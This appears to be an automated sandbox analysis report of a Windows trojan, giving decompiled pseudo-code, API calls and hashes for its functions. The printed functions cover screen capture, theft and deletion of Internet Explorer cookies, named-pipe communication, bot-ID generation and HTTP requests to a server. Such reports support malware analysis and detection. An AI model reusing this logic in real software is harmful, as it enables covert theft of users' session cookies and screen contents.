    • API String ID: 4246016607-2949297782
    • Opcode ID: bf242b3717cce281063d606931ff9c803aed1cc2456f81ca681bf808c747a810
    • Instruction ID: 88ed78742489ab723301526b4a81af94897e54d0bfdfb15fece7e2794ab3ec13
    • Opcode Fuzzy Hash: bf242b3717cce281063d606931ff9c803aed1cc2456f81ca681bf808c747a810
    • Instruction Fuzzy Hash: 8541E4B1701211BBD724AF628C85FDB7B68AF46700F05853AF604BB2C2CB789811D7AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 38%
    			E00409430(void* __ecx, void* __edx, struct HWND__* _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v76;
    				intOrPtr _t46;
    				signed int _t47;
    				intOrPtr _t48;
    				struct HDC__* _t50;
    				void* _t52;
    				signed int _t62;
    				intOrPtr _t72;
    				signed int _t73;
    				intOrPtr _t75;
    				void* _t77;
    				void* _t78;
    				intOrPtr _t82;
    				struct HDC__* _t85;
    
    				_v12 = 0;
    				 *0x416fe8(0x416a34);
    				if(E004091AE(__ecx, __edx) == 0) {
    					L22:
    					 *0x416fec(0x416a34);
    					return _v12;
    				}
    				_v76.cbSize = 0x3c;
    				if(GetWindowInfo(_a4,  &_v76) == 0) {
    					goto L22;
    				}
    				E00409403( &(_v76.rcClient));
    				E00409403( &(_v76.rcWindow));
    				_t75 = _v64;
    				if(_t75 <= 0) {
    					goto L22;
    				}
    				_t82 = _v60;
    				if(_t82 > 0) {
    					_t72 = _v48;
    					if(_t72 > 0) {
    						_t46 = _v44;
    						if(_t46 > 0) {
    							_t73 = _t72 - _v76.rcClient;
    							 *0x416a28 = _t73;
    							if(_t73 > 0 && _t75 - _v76.rcWindow > 0) {
    								_t47 = _t46 - _v52;
    								 *0x416a2c = _t47;
    								if(_t47 > 0 && _t82 - _v68 > 0) {
    									_t48 =  *0x416a9c(_a4, 0xfffffffc);
    									_v8 = _t48;
    									if(_t48 != 0) {
    										_t78 =  *0x416ac4(0, _t77);
    										if(_t78 != 0) {
    											_t50 =  *0x416e00(_t78);
    											_t85 = _t50;
    											 *0x416acc(0, _t78);
    											if(_t85 != 0) {
    												_t52 = SelectObject(_t85,  *0x416a54);
    												_v16 = _t52;
    												if(_t52 != 0) {
    													E0040F161( *0x416a58, ( *0x416a64 & 0x000000ff) *  *0x416a2c *  *0x416a28);
    													 *0x416a1c = GetCurrentThreadId();
    													 *0x416a18 = _t85;
    													 *0x416a30 = 1;
    													 *0x416a20 = 0;
    													 *0x416a24 = 0;
    													if((_v76.dwStyle & 0x00c40000) != 0 || _v76.dwStyle == 0 || (_v76.dwExStyle & 0x00020381) != 0) {
    														 *0x416ab4(_a4, 0x317, _t85, 2);
    														E004092C7( &(_v76.rcWindow));
    													}
    													_t62 = _v8(_a4, 0x14, _t85, 0);
    													asm("sbb eax, eax");
    													 *0x416a30 =  ~_t62 + 1;
    													 *0x416ab4(_a4, 0x317, _t85, 4);
    													_v8(_a4, 0xf, 0, 0);
    													E004092C7( &(_v76.rcClient));
    													_v12 = 0xffeeff00;
    													 *0x416a1c = 0;
    													SelectObject(_t85, _v16);
    												}
    												DeleteDC(_t85);
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				goto L22;
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(00416A34), ref: 00409441
      • Part of subcall function 004091AE: OpenFileMappingW.KERNEL32(00000002,00000000,QggrrtyW), ref: 004091D2
    • GetWindowInfo.USER32(?,?), ref: 00409462
    • SelectObject.GDI32(00000000), ref: 0040952C
    • GetCurrentThreadId.KERNEL32 ref: 0040955E
    • SelectObject.GDI32(00000000,?), ref: 004095FA
    • DeleteDC.GDI32(00000000), ref: 00409601
    • RtlLeaveCriticalSection.NTDLL(00416A34), ref: 0040960E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalObjectSectionSelect$CurrentDeleteEnterFileInfoLeaveMappingOpenThreadWindow
    • String ID: <
    • API String ID: 3122845836-4251816714
    • Opcode ID: 3a12ee53fd82aecf7a832a3d01c9d63bb7d52557b61548bfd9bb2b568cef89bf
    • Instruction ID: f65d9c098c7d9700440ffc229634fdde1d02c3f578555259555edb51f7c8fca7
    • Opcode Fuzzy Hash: 3a12ee53fd82aecf7a832a3d01c9d63bb7d52557b61548bfd9bb2b568cef89bf
    • Instruction Fuzzy Hash: 77516C71A01109ABCB10EFA5ED889DE7F79EF49384B12C43AF401B65A1C33A9D45CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411E85(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
    				long _v8;
    				struct _OVERLAPPED* _v12;
    				void _v16;
    				char _v518;
    				short _v536;
    				intOrPtr* _t28;
    				int _t35;
    				void** _t54;
    				void* _t61;
    				void* _t66;
    
    				_t28 = _a12;
    				if(_t28 != 0) {
    					 *_t28 = 0;
    				}
    				E0040F0FC( &_v536, L"\\\\.\\pipe\\", 0x12);
    				_v518 = 0;
    				E0040F201(0xffffffff, _a4,  &_v518);
    				_a7 = 0;
    				while(1) {
    					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
    					_t61 = _t35;
    					if(_t61 != 0xffffffff) {
    						break;
    					}
    					if(_a7 == 1) {
    						L17:
    						return _t35;
    					} else {
    						WaitNamedPipeW( &_v536, 0xffffffff);
    						_a7 = _a7 + 1;
    						continue;
    					}
    				}
    				_v8 = 2;
    				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) != 0) {
    					_v16 = _a8;
    					_v12 = 0;
    					if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) != 0 && ReadFile(_t61,  &_v16, 8,  &_v8, 0) != 0 && _v8 == 8) {
    						_t66 = E0040F0A8( &(_v12->Internal));
    						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
    							E0040F0C0(_t66);
    						} else {
    							_t54 = _a12;
    							if(_t54 != 0) {
    								 *_t54 = _t66;
    							}
    						}
    					}
    				}
    				_t35 = CloseHandle(_t61);
    				goto L17;
    			}


    APIs
    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411EE6
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00404270,00000000), ref: 00411EFE
    • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411F19
    • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F38
    • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F4E
    • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00411F77
    • CloseHandle.KERNEL32(00000000), ref: 00411F9B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$HandleNamedPipeRead$CloseCreateFreeHeapStateWaitWrite
    • String ID: \\.\pipe\
    • API String ID: 218207935-91387939
    • Opcode ID: 30fde200be2698894fca0cd8f0d734596f51256bce63d3928f452044aa25adcc
    • Instruction ID: 3a18ef4feb9663c0843798c04c1219987c74a97bfe045f250b4e3f5c40ef9670
    • Opcode Fuzzy Hash: 30fde200be2698894fca0cd8f0d734596f51256bce63d3928f452044aa25adcc
    • Instruction Fuzzy Hash: 43313B7190020CAFDB11EBA4DD88AEE77BCEB05354F0085A6B615E6190D7389E8ACB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004050A3(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
    				signed int _v528;
    				short _v536;
    				intOrPtr _v540;
    				long _v544;
    				char _v545;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				void* _v556;
    				char _v557;
    				void* _v560;
    				intOrPtr _v561;
    				intOrPtr _v564;
    				long _v568;
    				signed int _t35;
    				void* _t39;
    				signed int _t55;
    				intOrPtr _t70;
    				signed int* _t71;
    				struct _GOPHER_FIND_DATAA _t73;
    
    				_t71 = __edi;
    				_t66 = __ecx;
    				_t35 = _a4 & 0x00000001;
    				_v528 = _t35;
    				if(_t35 != 0) {
    					 *_a8 =  *_a8 & 0x00000000;
    					 *__edi =  *__edi & 0x00000000;
    				}
    				_v545 = 1;
    				_t73 = E0040F0A8(0x1000);
    				_v544 = 0x1000;
    				 *_t73 = 0x50;
    				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
    				_v544 = _t39;
    				if(_t39 == 0) {
    					L14:
    					E0040F0C0(_t73);
    					return _v561;
    				} else {
    					do {
    						_t81 = _v540;
    						if(_v540 == 0) {
    							__eflags = _a4 & 0x00000002;
    							if(__eflags == 0) {
    								 *0x416c30( *((intOrPtr*)(_t73 + 4)));
    							} else {
    								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
    								E0041547E(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
    							}
    							goto L10;
    						}
    						_t66 = E00404F49(_t66, _t81,  *(_t73 + 8));
    						_v556 = _t66;
    						if(_t66 == 0) {
    							goto L10;
    						}
    						_v548 = E0040F521(_t66);
    						_t55 = E0040F074( *_t71 + _v548,  *_a8);
    						if(_t55 == 0) {
    							_v557 = 0;
    							E0040F0C0(_v552);
    							E0040F0C0( *_a8);
    							L13:
    							FindCloseUrlCache(_v560);
    							goto L14;
    						}
    						_t70 = _v548;
    						 *_a8 = _t55;
    						_t66 =  *_t71 + _t55;
    						E0040F0FC( *_t71 + _t55, _v552, _t70);
    						 *_t71 =  *_t71 + _t70;
    						E0040F0C0(_v564);
    						L10:
    						_v560 = 0x1000;
    						 *_t73 = 0x50;
    						E0040F161(_t73, 0x1000);
    					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
    					goto L13;
    				}
    			}


    APIs
    • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 004050EE
    • PathFindFileNameW.SHLWAPI(?), ref: 0040516C
    • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 0040517D
    • DeleteUrlCacheEntryW.WININET(?), ref: 00405197
    • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 004051B8
    • FindCloseUrlCache.WININET(?), ref: 004051E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
    • String ID: cookie:$ie_cookies
    • API String ID: 468235262-2556801673
    • Opcode ID: 991952bd1d5a8fce671a6e9ba51445fb7957f9440a83482d0a4a62d31e7db818
    • Instruction ID: 9d6fc9f0665cb8e2dff4a7811efc14b5d08af2c97b360498bdd500806d7c7db7
    • Opcode Fuzzy Hash: 991952bd1d5a8fce671a6e9ba51445fb7957f9440a83482d0a4a62d31e7db818
    • Instruction Fuzzy Hash: E8418D71104702EFD7109F65D845B6BBBE4EF44344F00883EF894A62A1EB39C958DF9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040776D(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
    				int _v12;
    				long _v16;
    				void* _v20;
    				short _v544;
    				short _v1064;
    				void* _t26;
    				void* _t41;
    				int _t44;
    				void* _t45;
    				void* _t46;
    
    				_t46 = __edi;
    				_t45 = __ecx;
    				E0040B98C(__edi, _a4, 1,  &_v544);
    				E0040B98C(__edi, _a4, 2,  &_v1064);
    				_t44 = 0;
    				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
    				if(_t26 == 0) {
    					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
    					if(_t26 != 0) {
    						goto L1;
    					}
    					_v20 = CreateMutexW(0x417680, 1,  &_v544);
    					if(E00407873(__edi, _t45, E00405AC5 -  *0x416d84, 0) != 0) {
    						_a7 = 1;
    						_v16 = 0;
    						_v12 = 0;
    						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
    							if(_v16 != 0x103) {
    								L15:
    								_t44 = _a7;
    								goto L5;
    							}
    							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
    							if(_t41 != _t44) {
    								CloseHandle(_t41);
    								goto L15;
    							}
    							_v12 = _v12 + 1;
    							if(_v12 > 0x1f4) {
    								_a7 = _t44;
    								goto L15;
    							}
    							Sleep(0x14);
    						}
    						goto L15;
    					}
    					L5:
    					CloseHandle(_v20);
    					return _t44;
    				}
    				L1:
    				CloseHandle(_t26);
    				return 0;
    			}


    APIs
      • Part of subcall function 0040B98C: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00405809,00000002,?), ref: 0040B9A5
      • Part of subcall function 0040B98C: wnsprintfW.SHLWAPI ref: 0040B9C7
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 004077AC
    • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 004077B7
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 004077CE
    • CreateMutexW.KERNEL32(00417680,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 004077E6
    • CloseHandle.KERNEL32(?,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 0040780A
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407832
    • Sleep.KERNEL32(00000014,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 0040784B
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00407856
    • CloseHandle.KERNEL32(00000000,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407863
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
    • String ID:
    • API String ID: 3355469312-0
    • Opcode ID: 6ac731087c6ffc9911121925b8f5cabb11c165ab1d4facf4dd24d78bd589735f
    • Instruction ID: b95937e6517a3c578cca78bbb788a5f3281edb29cb54667581ca6bc8a2ad20b3
    • Opcode Fuzzy Hash: 6ac731087c6ffc9911121925b8f5cabb11c165ab1d4facf4dd24d78bd589735f
    • Instruction Fuzzy Hash: A6318676944218BFDB10AFA0DC88AFE7B7DEB04344F518076F605F2181D378AA45CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040B826(short* __edx) {
    				long _v8;
    				char _v12;
    				short _v112;
    				short _v632;
    				signed char _t32;
    				long _t39;
    				intOrPtr _t41;
    				long _t44;
    				intOrPtr _t48;
    				unsigned int _t50;
    				long _t54;
    				intOrPtr _t60;
    				long _t63;
    				void* _t67;
    				short* _t70;
    				void* _t73;
    				CHAR* _t74;
    
    				_t70 = __edx;
    				_t32 =  *0x416cd0; // 0x0
    				asm("sbb esi, esi");
    				_v8 = 0x206;
    				_t73 =  ~(_t32 & 1) + 0x80000002;
    				E0040F173( &_v632,  &_v632, 0, 0x208);
    				if(__edx == 0xffffffff) {
    					L9:
    					_v8 = 0x31;
    					if(GetComputerNameW( &_v112,  &_v8) == 0) {
    						lstrcpyW( &_v112, L"unknown");
    					}
    					_t39 = GetTickCount();
    					_t41 =  *0x416c34; // 0x25df5a8
    					_t18 = _t41 + 0x58; // 0x25dfb30
    					_t44 = wnsprintfW( &_v632, 0x103,  *_t18,  &_v112, _t39) + _t43;
    					L12:
    					_v8 = _t44 + 2;
    					_t48 =  *0x416c34; // 0x25df5a8
    					_t22 = _t48 + 0x38; // 0x25df870
    					_t23 = _t48 + 0x34; // 0x25df9a0
    					E004080D1(_t73,  *_t23,  *_t22, 1,  &_v632, _t44 + 2);
    					_t50 = _v8;
    					L13:
    					_v8 = (_t50 >> 1) - 1;
    					_t74 = E0040F47D((_t50 >> 1) - 1,  &_v632);
    					_t54 = CharLowerBuffA(_t74, _v8);
    					_t67 = 0;
    					if(_v8 <= 0) {
    						L20:
    						 *0x416df0 = _t74;
    						return _t54;
    					} else {
    						goto L14;
    					}
    					do {
    						L14:
    						_t54 =  *((intOrPtr*)(_t67 + _t74));
    						if(_t54 < 0x61 || _t54 > 0x7a) {
    							if(_t54 < 0x30 || _t54 > 0x39) {
    								 *((char*)(_t67 + _t74)) = 0x5f;
    							}
    						}
    						_t67 = _t67 + 1;
    					} while (_t67 < _v8);
    					goto L20;
    				}
    				if(__edx == 0 ||  *__edx == 0) {
    					_t60 =  *0x416c34; // 0x25df5a8
    					_t9 = _t60 + 0x38; // 0x25df870
    					_t10 = _t60 + 0x34; // 0x25df9a0
    					if(E00408088(_t73,  *_t10,  *_t9,  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
    						_t50 = _v8;
    						if(_t50 > 4) {
    							goto L13;
    						}
    					}
    					goto L9;
    				} else {
    					_t63 = E0040F533(__edx) + _t62;
    					_v8 = _t63;
    					if(_t63 >= 0x204) {
    						_t63 = 0x204;
    					}
    					E0040F0FC( &_v632, _t70, _t63);
    					_t44 = _v8;
    					goto L12;
    				}
    			}


    APIs
    • GetComputerNameW.KERNEL32(?,00000206), ref: 0040B8DB
    • lstrcpyW.KERNEL32(?,unknown), ref: 0040B8EE
    • GetTickCount.KERNEL32 ref: 0040B8F4
    • wnsprintfW.SHLWAPI ref: 0040B913
    • CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
    • String ID: 1$unknown
    • API String ID: 2565877886-2453001258
    • Opcode ID: ade916f91a228d2741d94118edaefae0663ff4f8422c9e6fed55891879245310
    • Instruction ID: 012d71207f02fe9e5b6beb43737170162e025cd5b326e2a22874ff9f5171b700
    • Opcode Fuzzy Hash: ade916f91a228d2741d94118edaefae0663ff4f8422c9e6fed55891879245310
    • Instruction Fuzzy Hash: 32417EB2900118AACF10EBA8CE49EDE77BDEB04304F1081B6E545E72A1D7359A45DB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FA56(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t19;
    				void* _t21;
    				char* _t27;
    				void* _t29;
    
    				_t19 = 0x8404f300;
    				if((_a20 & 0x00000002) != 0) {
    					_t19 = 0x8444f300;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t19 = _t19 | 0x00800000;
    				}
    				_t27 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t27 = "GET";
    				}
    				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, 0x416000, _t19, 0);
    				if(_t29 == 0) {
    					L12:
    					_t21 = 0;
    				} else {
    					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
    						L11:
    						InternetCloseHandle(_t29);
    						goto L12;
    					} else {
    						_a20 = 0;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L11;
    						} else {
    							_t21 = _t29;
    						}
    					}
    				}
    				return _t21;
    			}


    APIs
    • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,00416000,8404F300,00000000), ref: 0040FA9C
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040FAB1
    • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040FAD4
    • InternetCloseHandle.WININET(00000000), ref: 0040FAEC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 3080274660-2753618334
    • Opcode ID: 3d36f8a8f404a932f8f2879a40ce5c5bded012639e8218ce4d6e11d45ea05f32
    • Instruction ID: f63839cbd55a087bf071c573e1a6cd0ece69126faa7de7d8bfb023b666e23467
    • Opcode Fuzzy Hash: 3d36f8a8f404a932f8f2879a40ce5c5bded012639e8218ce4d6e11d45ea05f32
    • Instruction Fuzzy Hash: 6B1191712001296ADB218F519C4CFEB3E9DEB55798F108036BE09E52D0D7B9DA58CBE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E00406B38(void* _a4, long* _a8) {
    				char _v5;
    				signed int _v12;
    				char _v16;
    				char* _v20;
    				char _v24;
    				char* _v28;
    				char _v48;
    				char _v1564;
    				char _v1568;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t56;
    				intOrPtr _t63;
    				int _t65;
    				intOrPtr _t66;
    				signed int _t69;
    				long _t70;
    				intOrPtr _t71;
    				signed int _t76;
    				signed int _t79;
    				long* _t81;
    				signed int _t82;
    				char* _t89;
    				void* _t91;
    				signed int _t92;
    				signed int _t93;
    				void* _t95;
    
    				_t79 = 0;
    				_t91 =  *0x416da4(2, 2, 0);
    				if(_t91 != 0xffffffff) {
    					_v12 = 0;
    					 *0x416dd4(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
    					 *0x416d90(_t91);
    					_t82 = 0x4c;
    					_t56 = _v12 / _t82;
    					_t92 = 0;
    					_v5 = 1;
    					_v16 = 0;
    					_v20 = 0;
    					_v12 = _t56;
    					__eflags = _t56;
    					if(_t56 <= 0) {
    						L23:
    						__eflags = _v12 - _t79;
    						_t49 = _v12 != _t79;
    						__eflags = _t49;
    						return _t56 & 0xffffff00 | _t49;
    					}
    					_t89 =  &_v1564;
    					do {
    						__eflags =  *(_t89 - 4) & 0x00000001;
    						if(( *(_t89 - 4) & 0x00000001) == 0) {
    							goto L17;
    						}
    						_t56 = E00406B02(_t89);
    						__eflags = _t56;
    						if(_t56 != 0) {
    							goto L17;
    						}
    						__eflags = _v5 - _t79;
    						if(_v5 != _t79) {
    							_t66 =  *0x416c64; // 0x41b000
    							_t18 = _t66 + 0x24; // 0x20001c
    							_t84 =  *_t18 & 0x000000ff;
    							_t19 = _t66 + 0x26; // 0x10000020
    							_t21 = _t66 + 0x12c; // 0x200148
    							_t56 = E0040B52C( &_v24,  *_t19 & 0x000000ff, _t89, ( *_t18 & 0x000000ff) + _t21);
    							_t92 = _t56;
    							__eflags = _t92;
    							if(_t92 != 0) {
    								_t69 = E0040F244(_t56, _v24);
    								_t92 = 0;
    								_v28 = _t69;
    								__eflags = _t69;
    								if(_t69 != 0) {
    									_t70 = GetTickCount();
    									_t81 = _a8;
    									 *_t81 = _t70;
    									_t71 =  *0x416c64; // 0x41b000
    									_t26 = _t71 + 0x28; // 0x19331000
    									_t93 =  *_t26 & 0x0000ffff;
    									__eflags = InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0);
    									if(__eflags != 0) {
    										_t92 = E00406AC3(_t84,  &_v16, __eflags, _t93, _t73);
    									} else {
    										_t92 = 0;
    									}
    									_t76 = GetTickCount() -  *_t81;
    									__eflags = _t76;
    									 *_t81 = _t76;
    									E0040F0C0(_v28);
    								}
    								_t56 = E0040F0C0(_v24);
    							}
    							_v5 = 0;
    							_t79 = 0;
    							__eflags = 0;
    						}
    						__eflags = _t92 - _t79;
    						if(_t92 == _t79) {
    							L22:
    							goto L23;
    						} else {
    							_t63 =  *0x416c34; // 0x25df5a8
    							_t37 = _t63 + 0x6c; // 0x25dfc11
    							_t65 = wnsprintfA( &_v48, 0x14,  *_t37,  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
    							_t95 = _t95 + 0x1c;
    							_t56 = E0040AD1B( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
    							__eflags = _t56;
    							if(_t56 != 0) {
    								_v12 = _t79;
    								L20:
    								__eflags = _t92 - _t79;
    								if(_t92 != _t79) {
    									_t56 = E0040F0C0(_v16);
    								}
    								goto L22;
    							}
    						}
    						L17:
    						_v20 =  &(_v20[1]);
    						_t56 = _v20;
    						_t89 = _t89 + 0x4c;
    						__eflags = _t56 - _v12;
    					} while (_t56 < _v12);
    					goto L20;
    				}
    				return 0;
    			}


    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00406B4A
    • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00406B7B
    • closesocket.WS2_32(00000000), ref: 00406B82
    • GetTickCount.KERNEL32 ref: 00406C06
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 00406C2A
    • GetTickCount.KERNEL32 ref: 00406C44
    • wnsprintfA.SHLWAPI ref: 00406C8A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
    • String ID:
    • API String ID: 1843894412-0
    • Opcode ID: 556b7ad974a25361c4cb6343682172906826d07c6ab935427586046322c53c46
    • Instruction ID: 76e12400c7fe2ec71bdd07b7afffe08c774bfcab16e606a4c1e2298478928ed2
    • Opcode Fuzzy Hash: 556b7ad974a25361c4cb6343682172906826d07c6ab935427586046322c53c46
    • Instruction Fuzzy Hash: C651B5B1904129AFDB119FA48D85AEEBBB8EF05304F018176F941F3292D7399D15CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040E458(void* __ecx, signed int _a8, intOrPtr _a16, void* _a20) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void _v28;
    				intOrPtr _v40;
    				char* _v44;
    				intOrPtr _v68;
    				char* _v72;
    				void* _v88;
    				struct tagMSG _v116;
    				char _v376;
    				char _v1400;
    				void* __ebx;
    				void* __edi;
    				char* _t54;
    				int _t55;
    				signed int _t58;
    				void* _t62;
    				char* _t82;
    				int _t83;
    				void* _t84;
    				void* _t92;
    				void _t93;
    				void* _t94;
    
    				_v8 = _v8 | 0xffffffff;
    				_t92 = 0x3c;
    				_t83 = 0;
    				E0040F173( &_v88,  &_v88, 0, _t92);
    				E0040F173( &_v376,  &_v376, 0, 0x104);
    				E0040F173( &_v1400,  &_v1400, 0, 0x400);
    				_t94 = _a20;
    				_t93 = _a16;
    				_v72 =  &_v376;
    				_v44 =  &_v1400;
    				_t54 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
    				_v88 = _t92;
    				_v68 = 0x103;
    				_v40 = 0x3ff;
    				_v12 = 0;
    				if(( *(_t94 + 2) & 0x00000004) == 0) {
    					_t55 = InternetCrackUrlA(_t54, 0, 0,  &_v88);
    				} else {
    					_t82 = E0040C67E(( *(_t94 + 4) & 0x0000ffff) + _t94, __ecx, _t54, _t93);
    					_v12 = _t82;
    					_t55 = InternetCrackUrlA(_t82, 0, 0,  &_v88);
    					_t83 = 0;
    				}
    				if(_t55 == _t83) {
    					L15:
    					E0040F0C0(_v12);
    					return _v8;
    				} else {
    					_push( *((intOrPtr*)(_t93 + 0x430)));
    					_t84 = 2;
    					_t58 = E0040CC23(_t84);
    					_a8 = _t58;
    					if(_t58 == 0xffffffff) {
    						goto L15;
    					}
    					_v24 = _t58 * 0x30 +  *0x417024;
    					_v28 = _t93;
    					_v20 =  &_v88;
    					_v16 = 0;
    					_t62 = CreateThread(0, 0, E0040E267,  &_v28, 0, 0);
    					_a20 = _t62;
    					if(_t62 == 0) {
    						L11:
    						if(_v16 != 1) {
    							E0040CCAF(_a8, 0, _t93);
    						} else {
    							_v8 = 1;
    							if( *(_t94 + 0xc) > 0) {
    								E0040F0C0( *0x417028);
    								E0040F0C0( *0x41702c);
    								 *0x417028 = E0040F244(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
    								 *0x41702c = E0040F244(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
    							}
    						}
    						goto L15;
    					} else {
    						L8:
    						while(PeekMessageW( &_v116, 0, 0, 0, 1) != 0) {
    							DispatchMessageW( &_v116);
    						}
    						if(MsgWaitForMultipleObjects(1,  &_a20, 0, 0xffffffff, 0x4bf) != 0) {
    							goto L8;
    						}
    						CloseHandle(_a20);
    						goto L11;
    					}
    				}
    			}


    APIs
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0040E4ED
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040E4FE
    • CreateThread.KERNEL32(00000000,00000000,Function_0000E267,?,00000000,00000000), ref: 0040E54D
    • DispatchMessageW.USER32(?), ref: 0040E560
      • Part of subcall function 0040CCAF: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E5F5), ref: 0040CCC5
      • Part of subcall function 0040CCAF: CloseHandle.KERNEL32(?), ref: 0040CCCE
